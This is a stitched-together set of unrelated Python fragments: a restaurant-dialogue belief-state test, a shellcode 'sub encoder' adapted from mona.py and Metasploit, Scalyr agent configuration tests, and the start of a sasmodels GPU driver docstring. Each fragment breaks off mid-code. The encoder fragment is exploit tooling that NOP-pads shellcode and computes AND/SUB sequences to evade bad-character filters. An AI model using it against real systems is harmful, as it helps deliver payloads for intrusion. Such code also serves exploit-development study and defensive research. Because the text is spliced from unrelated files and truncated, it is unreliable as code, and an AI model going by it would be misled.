n = 0
for ent in entities:
if ent[slot] != 'not available':
val_dist[values.index(ent[slot])] += 1
n += 1
return entropy(val_dist/n)
def get_test_beliefs():
b1 = {'beliefs': {'allowedforkids': {'**NONE**': 0.0,
'0': 0.0,
'1': 0.0,
'dontcare': 1.0},
'area': {'**NONE**': 1.0,
'alamo square': 0.0,
'amanico ergina village': 0.0,
'anza vista': 0.0,
'ashbury heights': 0.0,
'balboa terrace': 0.0,
'bayview district': 0.0,
'bayview heights': 0.0,
'bernal heights': 0.0,
'bernal heights north': 0.0,
'bernal heights south': 0.0,
'buena vista park': 0.0,
'castro': 0.0,
'cathedral hill': 0.0,
'cayuga terrace': 0.0,
'central richmond': 0.0,
'central sunset': 0.0,
'central waterfront': 0.0,
'chinatown': 0.0,
'civic center': 0.0,
'clarendon heights': 0.0,
'cole valley': 0.0,
'corona heights': 0.0,
'cow hollow': 0.0,
'crocker amazon': 0.0,
'diamond heights': 0.0,
'doelger city': 0.0,
'dogpatch': 0.0,
'dolores heights': 0.0,
'dontcare': 0.0,
'downtown': 0.0,
'duboce triangle': 0.0,
'embarcadero': 0.0,
'eureka valley': 0.0,
'eureka valley dolores heights': 0.0,
'excelsior': 0.0,
'financial district': 0.0,
'financial district south': 0.0,
'fishermans wharf': 0.0,
'forest hill': 0.0,
'forest hill extension': 0.0,
'forest knolls': 0.0,
'fort mason': 0.0,
'fort winfield scott': 0.0,
'frederick douglass haynes gardens': 0.0,
'friendship village': 0.0,
'glen park': 0.0,
'glenridge': 0.0,
'golden gate heights': 0.0,
'golden gate park': 0.0,
'haight ashbury': 0.0,
'hayes valley': 0.0,
'hunters point': 0.0,
'india basin': 0.0,
'ingleside': 0.0,
'ingleside heights': 0.0,
'ingleside terrace': 0.0,
'inner mission': 0.0,
'inner parkside': 0.0,
'inner richmond': 0.0,
'inner sunset': 0.0,
'inset': 0.0,
'jordan park': 0.0,
'laguna honda': 0.0,
'lake': 0.0,
'lake shore': 0.0,
'lakeside': 0.0,
'laurel heights': 0.0,
'lincoln park': 0.0,
'lincoln park lobos': 0.0,
'little hollywood': 0.0,
'little italy': 0.0,
'little osaka': 0.0,
'little russia': 0.0,
'lone mountain': 0.0,
'lower haight': 0.0,
'lower nob hill': 0.0,
'lower pacific heights': 0.0,
'malcolm x square': 0.0,
'marcus garvey square': 0.0,
'marina district': 0.0,
'martin luther king square': 0.0,
'mastro': 0.0,
'merced heights': 0.0,
'merced manor': 0.0,
'midtown terrace': 0.0,
'miraloma park': 0.0,
'mission bay': 0.0,
'mission district': 0.0,
'mission dolores': 0.0,
'mission terrace': 0.0,
'monterey heights': 0.0,
'mount <NAME>': 0.0,
'nob hill': 0.0,
'noe valley': 0.0,
'noma': 0.0,
'north beach': 0.0,
'north panhandle': 0.0,
'north park': 0.0,
'north waterfront': 0.0,
'oceanview': 0.0,
'opera plaza': 0.0,
'outer mission': 0.0,
'outer parkside': 0.0,
'outer richmond': 0.0,
'outer sunset': 0.0,
'outset': 0.0,
'pacific heights': 0.0,
'panhandle': 0.0,
'park merced': 0.0,
'parkmerced': 0.0,
'parkside': 0.0,
'pine lake park': 0.0,
'portola': 0.0,
'potrero flats': 0.0,
'potrero hill': 0.0,
'presidio': 0.0,
'presidio heights': 0.0,
'richmond district': 0.0,
'russian hill': 0.0,
'saint francis wood': 0.0,
'san francisco airport': 0.0,
'san francisco state university': 0.0,
'sea cliff': 0.0,
'sherwood forest': 0.0,
'showplace square': 0.0,
'silver terrace': 0.0,
'somisspo': 0.0,
'south basin': 0.0,
'south beach': 0.0,
'south of market': 0.0,
'st francis square': 0.0,
'st francis wood': 0.0,
'stonestown': 0.0,
'sunnydale': 0.0,
'sunnyside': 0.0,
'sunset district': 0.0,
'telegraph hill': 0.0,
'tenderloin': 0.0,
'thomas paine square': 0.0,
'transmission': 0.0,
'treasure island': 0.0,
'twin peaks': 0.0,
'twin peaks west': 0.0,
'upper market': 0.0,
'van ness': 0.0,
'victoria mews': 0.0,
'visitacion valley': 0.0,
'vista del monte': 0.0,
'west of twin peaks': 0.0,
'west portal': 0.0,
'western addition': 0.0,
'westlake and olympic': 0.0,
'westwood highlands': 0.0,
'westwood park': 0.0,
'yerba buena island': 0.0,
'zion district': 0.0},
'discourseAct': {'ack': 0.0,
'bye': 0.0,
'hello': 0.0,
'none': 1.0,
'repeat': 0.0,
'silence': 0.0,
'thankyou': 0.0},
'food': {'**NONE**': 0.0,
'afghan': 0.0,
'arabian': 0.0,
'asian': 0.0,
'basque': 0.0,
'brasseries': 0.0,
'brazilian': 0.0,
'buffets': 0.0,
'burgers': 0.0,
'burmese': 0.0,
'cafes': 0.0,
'cambodian': 0.0,
'cantonese': 1.0,
'chinese': 0.0,
'comfort food': 0.0,
'creperies': 0.0,
'dim sum': 0.0,
'dontcare': 0.0,
'ethiopian': 0.0,
'ethnic food': 0.0,
'french': 0.0,
'gluten free': 0.0,
'himalayan': 0.0,
'indian': 0.0,
'indonesian': 0.0,
'indpak': 0.0,
'italian': 0.0,
'japanese': 0.0,
'korean': 0.0,
'kosher': 0.0,
'latin': 0.0,
'lebanese': 0.0,
'lounges': 0.0,
'malaysian': 0.0,
'mediterranean': 0.0,
'mexican': 0.0,
'middle eastern': 0.0,
'modern european': 0.0,
'moroccan': 0.0,
'new american': 0.0,
'pakistani': 0.0,
'persian': 0.0,
'peruvian': 0.0,
'pizza': 0.0,
'raw food': 0.0,
'russian': 0.0,
'sandwiches': 0.0,
'sea food': 0.0,
'shanghainese': 0.0,
'singaporean': 0.0,
'soul food': 0.0,
'spanish': 0.0,
'steak': 0.0,
'sushi': 0.0,
'taiwanese': 0.0,
'tapas': 0.0,
'thai': 0.0,
'traditionnal american': 0.0,
'turkish': 0.0,
'vegetarian': 0.0,
'vietnamese': 0.0},
'goodformeal': {'**NONE**': 0.0,
'breakfast': 0.0,
'brunch': 0.0,
'dinner': 0.0,
'dontcare': 1.0,
'lunch': 0.0},
'method': {'byalternatives': 0.0,
'byconstraints': 0.0,
'byname': 0.9285714285714286,
'finished': 0.0,
'none': 0.0714285714285714,
'restart': 0.0},
'name': {'**NONE**': 0.0,
'a 16': 0.0,
'a la turca restaurant': 0.0,
'abacus': 0.0,
'alamo square seafood grill': 0.0,
'albona ristorante istriano': 0.0,
'alborz persian cuisine': 0.0,
'allegro romano': 0.0,
'amarena': 0.0,
'amber india': 0.0,
'ame': 0.0,
'ananda fuara': 0.0,
'anchor oyster bar': 0.0,
'angkor borei restaurant': 0.0,
'aperto restaurant': 0.0,
'ar roi restaurant': 0.0,
'arabian nights restaurant': 0.0,
'assab eritrean restaurant': 0.0,
'atelier crenn': 0.0,
'aux delices restaurant': 0.0,
'aziza': 0.0,
'b star bar': 0.0,
'bar crudo': 0.0,
'beijing restaurant': 0.0,
'bella trattoria': 0.0,
'benu': 0.0,
'betelnut': 0.0,
'bistro central parc': 0.0,
'bix': 0.0,
'borgo': 0.0,
'borobudur restaurant': 0.0,
'bouche': 0.0,
'boulevard': 0.0,
'brothers restaurant': 0.0,
'bund shanghai restaurant': 0.0,
'burma superstar': 0.0,
'butterfly': 0.0,
'cafe claude': 0.0,
'cafe jacqueline': 0.0,
'campton place restaurant': 0.0,
'canteen': 0.0,
'canto do brasil restaurant': 0.0,
'capannina': 0.0,
'capital restaurant': 0.0,
'chai yo thai restaurant': 0.0,
'chaya brasserie': 0.0,
'chenery park': 0.0,
'chez maman': 0.0,
'chez papa bistrot': 0.0,
'chez spencer': 0.0,
'chiaroscuro': 0.0,
'chouchou': 0.0,
'chow': 0.0,
'city view restaurant': 0.0,
'claudine': 0.0,
'coi': 0.0,
'colibri mexican bistro': 0.0,
'coqueta': 0.0,
'crustacean restaurant': 0.0,
'da flora a venetian osteria': 0.0,
'darbar restaurant': 0.0,
'delancey street restaurant': 0.0,
'delfina': 0.0,
'dong baek restaurant': 0.0,
'dontcare': 0.0,
'dosa on fillmore': 0.0,
'dosa on valencia': 0.0,
'eiji': 0.0,
'enjoy vegetarian restaurant': 0.0,
'espetus churrascaria': 0.0,
'fang': 0.0,
'farallon': 0.0,
'fattoush restaurant': 0.0,
'fifth floor': 0.0,
'fino restaurant': 0.0,
'firefly': 0.0,
'firenze by night ristorante': 0.0,
'fleur de lys': 0.0,
'fog harbor fish house': 0.0,
| |
'''
Sub encoder that is based on the Alphanum Encoder that is part of monay.py
and the Optimised Subencoder that is part of Metasploit
https://github.com/rapid7/metasploit-framework/blob/master//modules/encoders/x86/opt_sub.rb
https://github.com/corelan/mona
'''
import argparse
import binascii
import sys
import os
"""
For the type of encoder we are going to use, this is a list of characters that
will conflict with the bad character list
first, check if there are no bad char conflicts - AND eAX, SUB r8, SUB eAX, XOR r/m16/32, XOR r8, XOR eAX,
DEC eDX , DEC eBP, DEC eSI
PUSH eAX, PUSH eBP, POP eSP
"""
NOBADCHARS = "\x25\x2a\x2d\x31\x32\x35\x4a\x4d\x4e\x50\x55\x5c"
# Instruction dictionary
ASM_DICT = {
'NOP':"\x90",
'AND':{
'EAX':"\x25"
},
'SUB':{
'EAX':"\x2D"
},
'PUSH':{
'EBP':"\x55",
'ESP':"\x54",
'EAX':"\x50",
'EBX':"\x53",
'ECX':"\x51",
'EDX':"\x52",
'EDI':"\x57",
'ESI':"\x56"
},
'POP':{
'ESP':"\x5C",
'EAX':"\x58"
}
}
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def find_opposit_bytes(char_list):
'''
Given a list of characters, find opposit bytes that
when AND'd together equal 0
return two values in hex
'''
is_found = False
ord1 = None
ord2 = None
for val1 in char_list:
for val2 in char_list:
ord1 = '{:02x}'.format(ord(val1)) * 4
ord2 = '{:02x}'.format(ord(val2)) * 4
int1 = hex_str_to_int(ord1)
int2 = hex_str_to_int(ord2)
if int1 & int2 == 0:
print("[+] Opposite Values Founds (AND'ing Values): {} & {}".format(ord1, ord2))
is_found = True
break
if is_found:
break
if not is_found:
print("[-] Failed to find opposite values")
return (ord1, ord2)
def prepare_shellcode(pShelcode):
'''
Align shellcode and split into 4 byte chunks
'''
rem = len(pShelcode) % 4
if rem != 0:
nop_sled = [ASM_DICT['NOP']] * (4-rem)
pShelcode = pShelcode + nop_sled
# Verify that we are aligned now
if (len(pShelcode) % 4) == 0:
print("[+] Added {} nops to alight shellcode to 4 bytes".format(len(nop_sled)))
else:
print("[-] Shellcode is not 4 byte aligned, can't continue.")
return None
# get hex value from shellcode
hex_str = bin2hex(pShelcode)
chunks = hex2array(hex_str, size=8)
reversed_chunks = chunks[::-1]
print("\n[+] ======== Shellcode Broken into Chunks ======== ")
print("[+] Number of chunks: {}".format(len(chunks)))
print("[+] Chunks: {}".format(chunks))
print("[+] Reversed Chunks: {}".format(reversed_chunks))
return reversed_chunks
def process_inputfile(input_file):
'''
Read in the input file and convert contents to Hex string list
'''
with open(input_file, 'r') as fd:
contents = fd.readline().strip()
hex_str = hex2bin(contents)
return hex_str
def bin2hex(bin_bytes):
'''
Converts hex string to a string of space separated hex bytes
'''
hex_str = ''.join('%02x' % ord(c) for c in bin_bytes)
return hex_str
def hex2array(hex_str, size=2):
'''
Convert a string of hex bytes into an array of size chunks
Default is 2 (1 byte)
'''
hex_array = [hex_str[i:i+size] for i in range(0, len(hex_str),size)]
return hex_array
def hex2bin(pattern):
"""
Converts a hex string (\\x??\\x??\\x??\\x??) to real hex bytes
Arguments:
pattern - A string representing the bytes to convert
Return:
the bytes
"""
pattern = pattern.replace("\\x", "")
pattern = pattern.replace("\"", "")
pattern = pattern.replace("\'", "")
hex_str = [binascii.a2b_hex(i + j) for i, j in zip(str(pattern[0::2]), str(pattern[1::2]))]
return hex_str
def hex_str_to_int(input_str):
"""
Converts a string with hex bytes to a numeric value
"""
try:
val_to_return = int(input_str, 16)
except Exception as e:
val_to_return = 0
print('Exception converting hex to int: {}'.format(e))
return val_to_return
def to_hex(input_int):
'''
Convert integer value to hex
'''
return '{:08x}'.format(input_int)
def tohex(val, nbits=32):
'''
Convert an integer value to hex
use nbits to compute twos complement value
'''
#return hex((val + (1 << nbits)) % (1 << nbits))
intval = ((val + (1 << nbits)) % (1 << nbits))
return '{:08x}'.format(intval)
def validatebadchars_enc(val1, val2, val3, badchars):
newvals = []
allok = 0
giveup = 0
type = 0
origval1 = val1
origval2 = val2
origval3 = val3
d1 = 0
d2 = 0
d3 = 0
lastd1 = 0
lastd2 = 0
lastd3 = 0
while allok == 0 and giveup == 0:
# check if there are bad chars left
charcnt = 0
val1ok = 1
val2ok = 1
val3ok = 1
while charcnt < len(badchars):
if (("{:02x}".format(int(val1)))in badchars):
val1ok = 0
if (("{:02x}".format(int(val2))) in badchars):
val2ok = 0
if (("{:02x}".format(int(val3))) in badchars):
val3ok = 0
charcnt = charcnt + 1
if (val1ok == 0) or (val2ok == 0) or (val3ok == 0):
allok = 0
else:
allok = 1
if allok == 0:
# try first by sub 1 from val1 and val2, and add more to val3
if type == 0:
val1 = val1 - 1
val2 = val2 - 1
val3 = val3 + 2
if (val1 < 1) or (val2 == 0) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
type = 1
if type == 1:
# then try by add 1 to val1 and val2, and sub more from val3
val1 = val1 + 1
val2 = val2 + 1
val3 = val3 - 2
if (val1 > 126) or (val2 > 126) or (val3 < 1):
val1 = origval1
val2 = origval2
val3 = origval3
type = 2
if type == 2:
# try by sub 2 from val1, and add 1 to val2 and val3
val1 = val1 - 2
val2 = val2 + 1
val3 = val3 + 1
if (val1 < 1) or (val2 > 126) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
type = 3
if type == 3:
# try by add 2 to val1, and sub 1 from val2 and val3
val1 = val1 + 2
val2 = val2 - 1
val3 = val3 - 1
if (val1 > 126) or (val2 < 1) or (val3 < 1):
val1 = origval1
val2 = origval2
val3 = origval3
type = 4
if type == 4:
if (val1ok == 0):
val1 = val1 - 1
d1 = d1 + 1
else:
# now spread delta over other 2 values
if (d1 > 0):
val2 = val2 + 1
val3 = origval3 + d1 - 1
d1 = d1 - 1
else:
val1 = 0
if (val1 < 1) or (val2 > 126) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
d1 = 0
type = 5
if type == 5:
if (val1ok == 0):
val1 = val1 + 1
d1 = d1 + 1
else:
# now spread delta over other 2 values
if (d1 > 0):
val2 = val2 - 1
val3 = origval3 - d1 + 1
d1 = d1 - 1
else:
val1 = 255
if (val1 > 126) or (val2 < 1) or (val3 < 1):
val1 = origval1
val2 = origval2
val3 = origval3
val1ok = 0
val2ok = 0
val3ok = 0
d1 = 0
d2 = 0
d3 = 0
type = 6
if type == 6:
if (val1ok == 0):
val1 = val1 - 1
# d1=d1+1
if (val2ok == 0):
val2 = val2 + 1
# d2=d2+1
d3 = origval1 - val1 + origval2 - val2
val3 = origval3 + d3
if (lastd3 == d3) and (d3 > 0):
val1 = origval1
val2 = origval2
val3 = origval3
giveup = 1
else:
lastd3 = d3
if (val1 < 1) or (val2 < 1) or (val3 > 126):
val1 = origval1
val2 = origval2
val3 = origval3
giveup = 1
# check results
charcnt = 0
val1ok = 1
val2ok = 1
val3ok = 1
val1text = "OK"
val2text = "OK"
val3text = "OK"
while charcnt < len(badchars):
if (val1 == badchars[charcnt]):
val1ok = 0
val1text = "NOK"
if (val2 == badchars[charcnt]):
val2ok = 0
val2text = "NOK"
if (val3 == badchars[charcnt]):
val3ok = 0
val3text = "NOK"
charcnt = charcnt + 1
if (val1ok == 0) or (val2ok == 0) or (val3ok == 0):
print(" ** Unable to fix bad char issue !")
print(" -> Values to check : %s(%s) %s(%s) %s(%s) " % (
bin2hex(origval1), val1text, bin2hex(origval2), val2text, bin2hex(origval3), val3text))
val1 = | |
50)
config_object = JsonObject(content={"foo": 100})
config._Configuration__verify_or_set_optional_int(
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
min_value=10,
max_value=100,
)
self.assertEqual(config_object["foo"], 100)
# 2. value < min
config_object = JsonObject(content={"foo": 9})
expected_msg = 'Got invalid value "9" for field "foo". Value must be greater than or equal to 10'
self.assertRaisesRegexp(
BadConfiguration,
expected_msg,
config._Configuration__verify_or_set_optional_int,
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
min_value=10,
max_value=100,
)
# 3. value > max
config_object = JsonObject(content={"foo": 101})
expected_msg = 'Got invalid value "101" for field "foo". Value must be less than or equal to 100'
self.assertRaisesRegexp(
BadConfiguration,
expected_msg,
config._Configuration__verify_or_set_optional_int,
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
min_value=10,
max_value=100,
)
def test___verify_or_set_optional_string_with_valid_values(self):
config = self._create_test_configuration_instance()
# 1. Valid value
config_object = JsonObject(content={"foo": "bar"})
config._Configuration__verify_or_set_optional_string(
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
valid_values=["bar", "baz"],
)
self.assertEqual(config_object["foo"], "bar")
# 2. Not a valid value
config_object = JsonObject(content={"foo": "invalid"})
expected_msg = (
'Got invalid value "invalid" for field "foo". Valid values are: bar, baz'
)
self.assertRaisesRegexp(
BadConfiguration,
expected_msg,
config._Configuration__verify_or_set_optional_string,
config_object=config_object,
field="foo",
default_value=None,
config_description=None,
valid_values=["bar", "baz"],
)
def test_max_send_rate_enforcement_legacy_defaults(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
max_send_rate_enforcement: "legacy"
}
"""
)
config = self.get_configuration()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "legacy")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 1048576)
self.assertEquals(config.pipeline_threshold, 1.1)
self.assertEquals(config.min_request_spacing_interval, 1.0)
self.assertEquals(config.max_request_spacing_interval, 5.0)
self.assertEquals(config.max_log_offset_size, 5242880)
self.assertEquals(config.max_existing_log_offset_size, 104857600)
def test_disable_max_send_rate_enforcement_overrides(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
disable_max_send_rate_enforcement_overrides: true
}
"""
)
config = self.get_configuration()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "unlimited")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 1048576)
self.assertEquals(config.pipeline_threshold, 1.1)
self.assertEquals(config.min_request_spacing_interval, 1.0)
self.assertEquals(config.max_request_spacing_interval, 5.0)
self.assertEquals(config.max_log_offset_size, 5242880)
self.assertEquals(config.max_existing_log_offset_size, 104857600)
def test_max_send_rate_enforcement_overrides(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
max_allowed_request_size: 1234,
pipeline_threshold: 0.3,
min_request_spacing_interval: 3.0,
max_request_spacing_interval: 4.0,
max_log_offset_size: 1234,
max_existing_log_offset_size: 1234
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "unlimited")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 5900000)
self.assertEquals(config.pipeline_threshold, 0)
self.assertEquals(config.min_request_spacing_interval, 0.0)
self.assertEquals(config.max_request_spacing_interval, 5.0)
self.assertEquals(config.max_log_offset_size, 200000000)
self.assertEquals(config.max_existing_log_offset_size, 200000000)
def test_max_send_rate_enforcement_legacy_dont_override(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
max_send_rate_enforcement: "legacy",
max_allowed_request_size: 1234,
pipeline_threshold: 0.3,
min_request_spacing_interval: 3.0,
max_request_spacing_interval: 4.0,
max_log_offset_size: 1234,
max_existing_log_offset_size: 1234
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "legacy")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 1234)
self.assertEquals(config.pipeline_threshold, 0.3)
self.assertEquals(config.min_request_spacing_interval, 3.0)
self.assertEquals(config.max_request_spacing_interval, 4.0)
self.assertEquals(config.max_log_offset_size, 1234)
self.assertEquals(config.max_existing_log_offset_size, 1234)
def test_win32_max_open_fds(self):
# 1. default value
self._write_file_with_separator_conversion(
""" {
api_key: "foo",
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.win32_max_open_fds, 512)
# 2. overwritten value
self._write_file_with_separator_conversion(
""" {
api_key: "foo",
win32_max_open_fds: 1024
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.win32_max_open_fds, 1024)
class TestWorkersConfiguration(TestConfigurationBase):
def test_no_workers_entry_(self):
# The 'workers' list does not exist, a default api_key entry should be created.
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
# only defaults are created.
assert len(config.worker_configs) == 1
assert config.worker_configs[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=config.default_sessions_per_worker,
)
def test_empty_workers_entry(self):
"""
Does not make so much sense, but still a valid case to apply a default worker.
:return:
"""
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
workers: [
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 1
api_key = config.worker_configs[0]
assert api_key == JsonObject(
api_key=config.api_key,
id="default",
sessions=config.default_sessions_per_worker,
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 1)
self.assertEqual(api_keys_count, 1)
def test_overwrite_default_workers(self):
self._write_file_with_separator_conversion(
""" {
api_key: "key"
workers: [
{
"api_key": "key", id: "default", "sessions": 4
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 1
assert config.worker_configs[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=4,
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 4)
self.assertEqual(api_keys_count, 1)
def test_overwrite_default_workers_without_api_key(self):
self._write_file_with_separator_conversion(
""" {
api_key: "key"
workers: [
{
id: "default", "sessions": 4
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 1
assert config.worker_configs[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=4,
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 4)
self.assertEqual(api_keys_count, 1)
def test_default_workers_and_second(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key", "id": "second"
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 2
workers = list(config.worker_configs)
assert workers[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=config.default_sessions_per_worker,
)
assert workers[1] == JsonObject(
api_key="key",
id="second",
sessions=1,
)
def test_second_default_api_key(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key", "id": "default"
},
{
"api_key": "key2", "id": "default"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"The API key of the default worker has to match the main API key of the configuration"
in err_info.value.message
)
def test_worker_id_duplication(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key", "id": "second"
},
{
"api_key": "key2", "id": "second"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"There are multiple workers with the same 'second' id. Worker id's must remain unique."
in err_info.value.message
)
def test_api_key_field_missing(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"id": "second"
},
{
"api_key": "key2", "id": "third"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert 'The required field "api_key" is missing.' in err_info.value.message
def test_api_key_entry_id_field_missing(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key"
},
{
"api_key": "key2", "id": "third"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert 'The required field "id" is missing.' in err_info.value.message
def test_log_file_bind_to_workers_entries(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
api_key: "key2"
"sessions": 4,
"id": "second",
}
],
logs: [
{
path: "/some/path.log",
worker_id: "second"
},
{
path: "/some/path2.log",
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 2
assert config.worker_configs[0] == JsonObject(
sessions=1, api_key=config.api_key, id="default"
)
assert config.worker_configs[1] == JsonObject(
sessions=4,
api_key="key2",
id="second",
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 5)
self.assertEqual(api_keys_count, 2)
def test_log_file_bind_to_worker_entries_with_non_existing_id(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
api_key: "key2"
"sessions": 4,
"id": "second"
}
],
logs: [
{
path: "/some/path.log",
worker_id: "wrong worker id"
},
{
path: "/some/path2.log",
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"refers to a non-existing worker with id 'wrong worker id'."
in err_info.value.message
)
assert "Valid worker ids: default, second." in err_info.value.message
def test_workers_type_default(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert not config.use_multiprocess_workers
@skipIf(platform.system() == "Windows", "Skipping tests under Windows")
@skipIf(
sys.version_info < (2, 7), "Skipping multiprocess configuration for python 2.6"
)
def test_workers_type_multiprocess(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
use_multiprocess_workers: true
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert config.use_multiprocess_workers
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "multiprocess")
self.assertEqual(sessions_count, 1)
self.assertEqual(api_keys_count, 1)
@skipIf(platform.system() == "Windows", "Skipping tests under Windows")
@skipIf(
sys.version_info < (2, 7), "Skipping multiprocess configuration for python 2.6"
)
def test_workers_type_multiprocess_from_env(self):
os_environ_unicode["SCALYR_USE_MULTIPROCESS_WORKERS"] = "True"
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert config.use_multiprocess_workers
@skipIf(platform.system() != "Windows", "Skipping Linux only tests on Windows")
@skipIf(
sys.version_info < (2, 7), "Skipping multiprocess configuration for python 2.6"
)
def test_workers_type_multiprocess_windows(self):
# 'use_multiprocess_workers' option should cause error on Windows.
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
use_multiprocess_workers: true
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"The 'use_multiprocess_workers' option is not supported on windows machines."
in err_info.value.message
)
def test_default_sessions_per_worker(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{"api_key": "another_key", "id": "second", "sessions": 3},
{"api_key": "another_key2", "id": "third"}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 3
assert config.worker_configs[0]["api_key"] == config.api_key
assert (
config.worker_configs[0]["sessions"] == config.default_sessions_per_worker
)
assert config.worker_configs[1]["api_key"] == "another_key"
assert config.worker_configs[1]["sessions"] == 3
assert config.worker_configs[2]["api_key"] == "another_key2"
assert (
config.worker_configs[2]["sessions"] == config.default_sessions_per_worker
)
def test_workers_negative_sessions_number(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
workers: [
{"api_key": "another_key", "id": "second_key"},
{"api_key": "another_key2", "id": "third_key", "sessions": -1}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert "Value must be greater than or equal to 1" in err_info.value.message
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
default_sessions_per_worker: -1,
workers: [
{"api_key": "another_key", "id": "second_key"},
{"api_key": "another_key2", "id": "third_key"}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert "Value must be greater than or equal to 1" in err_info.value.message
def test_default_sessions_per_worker_from_env(self):
os_environ_unicode["SCALYR_DEFAULT_SESSIONS_PER_WORKER"] = "4"
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
workers: [
{"api_key": "another_key", "id": "second_key"},
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert config.default_sessions_per_worker == 4
return
def test_config_fragment(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi | |
<filename>sasmodels/kernelcl.py
"""
GPU driver for C kernels
TODO: docs are out of date
There should be a single GPU environment running on the system. This
environment is constructed on the first call to :func:`env`, and the
same environment is returned on each call.
After retrieving the environment, the next step is to create the kernel.
This is done with a call to :meth:`GpuEnvironment.make_kernel`, which
returns the type of data used by the kernel.
Next a :class:`GpuData` object should be created with the correct kind
of data. This data object can be used by multiple kernels, for example,
if the target model is a weighted sum of multiple kernels. The data
should include any extra evaluation points required to compute the proper
data smearing. This need not match the square grid for 2D data if there
is an index saying which q points are active.
Together the GpuData, the program, and a device form a :class:`GpuKernel`.
